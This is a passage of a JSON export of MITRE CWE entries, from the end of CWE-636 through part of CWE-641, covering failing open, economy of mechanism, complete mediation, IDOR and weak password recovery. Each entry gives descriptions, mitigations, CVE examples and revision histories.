safe.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"280","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Failing Open"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Intended access restrictions can be bypassed, which is often contradictory to what the product\'s administrator expects."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Subdivide and allocate resources and components so that a failure in one part does not affect the entire product."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Switches may revert their functionality to that of hubs when the table used to map ARP information to the switch interface overflows, such as when under a spoofing attack. This results in traffic being broadcast to an eavesdropper, instead of being sent only on the relevant switch interface. To mitigate this type of problem, the developer could limit the number of ARP entries that can be recorded for a given switch interface, while other interfaces may keep functioning normally. Configuration options can be provided on the appropriate actions to be taken in case of a detected failure, but safe defaults should be used."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5277","Description":"The failure of connection attempts in a web browser resets DNS pin restrictions. An attacker can then bypass the same origin policy by rebinding a domain name to a different IP address. This was an attempt to \\"fail functional.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5277"},{"Reference":"CVE-2006-4407","Description":"Incorrect prioritization leads to the selection of a weaker cipher. Although it is not known whether this issue occurred in implementation or design, it is feasible that a poorly designed algorithm could be a factor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-522"}}]},"Notes":{"Note":{"#text":"Since design issues are hard to fix, they are rarely publicly reported, so there are few CVE examples of this problem as of January 2008. Most publicly reported issues occur as the result of an implementation error instead of design, such as CVE-2005-3177 (Improper handling of large numbers of resources) or CVE-2005-2969 (inadvertently disabling a verification step, leading to selection of a weaker protocol).","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Failing Securely","attr":{"@_Date":"2008-09-09"}},{"#text":"Design Principle Violation: Not Failing Securely (aka \'Failing Open\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Not Failing Securely (aka \'Failing Open\')","attr":{"@_Date":"2009-05-27"}}]}},"637":{"attr":{"@_ID":"637","@_Name":"Unnecessary Complexity in Protection Mechanism (Not Using \'Economy of Mechanism\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used.","Extended_Description":"Security mechanisms should be as simple as possible. Complex security mechanisms may engender partial implementations and compatibility problems, with resulting mismatches in assumptions and implemented security. A corollary of this principle is that data specifications should be as simple as possible, because complex data specifications result in complex validation code. Complex tasks and systems may also need to be guarded by complex security checks, so simple systems should be preferred.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unnecessary Complexity"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Avoid complex security mechanisms when simpler ones would meet requirements. Avoid complex data models, and unnecessarily complex operations. Adopt architectures that provide guarantees, simplify understanding through elegance and abstraction, and that can be implemented similarly. Modularize, isolate and do not trust complex code, and apply other secure programming principles on these modules (e.g., least privilege) to mitigate vulnerabilities."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The IPSEC specification is complex, which resulted in bugs, partial implementations, and incompatibilities between vendors."},{"Intro_Text":"HTTP Request Smuggling (CWE-444) attacks are feasible because there are not stringent requirements for how illegal or inconsistent HTTP headers should be handled. This can lead to inconsistent implementations in which a proxy or firewall interprets the same data stream as a different set of requests than the end points in that stream."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6067","Description":"Support for complex regular expressions leads to a resultant algorithmic complexity weakness (CWE-407).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6067"},{"Reference":"CVE-2007-1552","Description":"Either a filename extension and a Content-Type header could be used to infer the file type, but the developer only checks the Content-Type, enabling unrestricted file upload (CWE-434).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1552"},{"Reference":"CVE-2007-6479","Description":"In Apache environments, a \\"filename.php.gif\\" can be redirected to the PHP interpreter instead of being sent as an image/gif directly to the user. Not knowing this, the developer only checks the last extension of a submitted filename, enabling arbitrary code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6479"},{"Reference":"CVE-2005-2148","Description":"The developer cleanses the $_REQUEST superglobal array, but PHP also populates $_GET, allowing attackers to bypass the protection mechanism and conduct SQL injection attacks against code that uses $_GET.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2148"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-524"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Using Economy of Mechanism","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Use Economy of Mechanism","attr":{"@_Date":"2010-12-13"}}]}},"638":{"attr":{"@_ID":"638","@_Name":"Not Using Complete Mediation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity\'s rights or privileges change over time.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data","Other"],"Note":"A user might retain access to a critical resource even after privileges have been revoked, possibly allowing access to privileged functionality or sensitive information, depending on the role of the resource."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Invalidate cached privileges, file handles or descriptors, or other access credentials whenever identities, processes, policies, roles, capabilities or permissions change. Perform complete authentication checks before accepting, caching and reusing data, dynamic content and code (scripts). Avoid caching access control decisions as much as possible."},{"Phase":"Architecture and Design","Description":"Identify all possible code paths that might access sensitive resources. If possible, create and use a single interface that performs the access checks, and develop code standards that require use of this interface."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"When executable library files are used on web servers, which is common in PHP applications, the developer might perform an access check in any user-facing executable, and omit the access check from the library file itself. By directly requesting the library file (CWE-425), an attacker can bypass this access check."},{"Intro_Text":"When a developer begins to implement input validation for a web application, often the validation is performed in each area of the code that uses externally-controlled input. In complex applications with many inputs, the developer often misses a parameter here or a cookie there. One frequently-applied solution is to centralize all input validation, store these validated inputs in a separate data structure, and require that all access of those inputs must be through that data structure. An alternate approach would be to use an external input validation framework such as Struts, which performs the validation before the inputs are ever processed by the code."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-0408","Description":"Server does not properly validate client certificates when reusing cached connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0408"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"104"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-526"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Using Complete Mediation","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Use Complete Mediation","attr":{"@_Date":"2010-12-13"}}]}},"639":{"attr":{"@_ID":"639","@_Name":"Authorization Bypass Through User-Controlled Key","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The system\'s authorization functionality does not prevent one user from gaining access to another user\'s data or record by modifying the key value identifying the data.","Extended_Description":{"xhtml:p":["Retrieval of a user record occurs in the system based on some key value that is under user control. The key would typically identify a user-related record stored in the system and would be used to lookup that record for presentation to the user. It is likely that an attacker would have to be an authenticated user in the system. However, the authorization process would not properly check the data access operation to ensure that the authenticated user performing the operation has sufficient entitlements to perform the requested data access, hence bypassing any other authorization checks present in the system.","For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value.","One manifestation of this weakness is when a system uses sequential or otherwise easily-guessable session IDs that would allow one user to easily switch to another user\'s session and read/modify their data."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Insecure Direct Object Reference / IDOR","Description":"The \\"Insecure Direct Object Reference\\" term, as described in the OWASP Top Ten, is broader than this CWE because it also covers path traversal (CWE-22). Within the context of vulnerability theory, there is a similarity between the OWASP concept and CWE-706: Use of Incorrectly-Resolved Name or Reference."},{"Term":"Broken Object Level Authorization / BOLA","Description":"BOLA is used in the 2019 OWASP API Security Top 10 and is said to be the same as IDOR."},{"Term":"Horizontal Authorization","Description":"\\"Horizontal Authorization\\" is used to describe situations in which two users have the same privilege level, but must be prevented from accessing each other\'s resources. This is fairly common when using key-based access to resources in a multi-user context."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Access control checks for specific user data or functionality can be bypassed."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Horizontal escalation of privilege is possible (one user can view/modify information of another user)."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested."},{"Phase":["Architecture and Design","Implementation"],"Description":"Make sure that the key that is used in the lookup of a specific user\'s record is not controllable externally by the user or that any tampering can be detected."},{"Phase":"Architecture and Design","Description":"Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering."}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"}],"Previous_Entry_Name":{"#text":"Access Control Bypass Through User-Controlled Key","attr":{"@_Date":"2011-03-29"}}}},"640":{"attr":{"@_ID":"640","@_Name":"Weak Password Recovery Mechanism for Forgotten Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.","Extended_Description":{"xhtml:p":["It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user\'s account. Weak password recovery schemes completely undermine a strong password authentication scheme.","This weakness may be that the security question is too easy to guess or find an answer to (e.g. because the question is too common, or the answers can be found using social media). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system\'s weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain unauthorized access to the system by retrieving legitimate user\'s authentication credentials."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker could deny service to legitimate system users by launching a brute force attack on the password recovery mechanism using user ids of legitimate users."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The system\'s security functionality is turned against the system by the attacker."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated."},{"Phase":"Architecture and Design","Description":"Do not use standard weak security questions and use several security questions."},{"Phase":"Architecture and Design","Description":"Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses."},{"Phase":"Architecture and Design","Description":"Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record."},{"Phase":"Architecture and Design","Description":"Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism."},{"Phase":"Architecture and Design","Description":"Assign a new temporary password rather than revealing the original password."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":49,"Entry_Name":"Insufficient Password Recovery"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"50"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}}},"Notes":{"Note":[{"#text":"This entry might be reclassified as a category or \\"loose composite,\\" since it lists multiple specific errors that can make the mechanism weak. However, under view 1000, it could be a weakness under protection mechanism failure, although it is different from most PMF issues since it is related to a feature that is designed to bypass a protection mechanism (specifically, the lack of knowledge of a password).","attr":{"@_Type":"Maintenance"}},{"#text":"This entry probably needs to be split; see extended description.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Weak Password Recovery Mechanism","attr":{"@_Date":"2008-09-09"}}}},"641":{"attr":{"@_ID":"641","@_Name":"Improper Restriction of Names for Files and Other Resources","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application constructs the name of a file or other resource using input from an upstream component, but it does not restrict or incorrectly restricts the resulting name.","Extended_Description":"This may produce resultant weaknesses. For instance, if the names of these resources contain scripting characters, it is possible that a script may get executed in the client\'s browser if the application ever displays the name of the resource on a dynamically generated web page. Alternately, if the resources are consumed by some application parser, a specially crafted name can exploit some vulnerability internal to the parser, potentially resulting in execution of arbitrary code on the server machine. The problems will vary based on the context of usage of such malformed resource names and whether vulnerabilities are present in or assumptions are made by the targeted technology that would make code execution possible.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"99","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Execution of arbitrary code in the context of usage of the resources with dangerous names."},{"Scope":["Confidentiality","Availability"],"Impact":["Read Application Data","DoS: Crash, Exit, or Restart"],"Note":"Crash of the consumer code of these resources resulting in information leakage or denial of service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not allow users to control names of resources used on the server side."},{"Phase":"Architecture and Design","Description":"Perform allowlist input validation at entry points and also before consuming the resources. Reject bad file names rather than trying to cleanse them."},{"Phase":"Architecture and Design","Description":"Make sure that technologies consuming the resources are not vulnerable (e.g. buffer overflow, format string, etc.) in a way that would allow code execution if the name of the resource is malformed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated 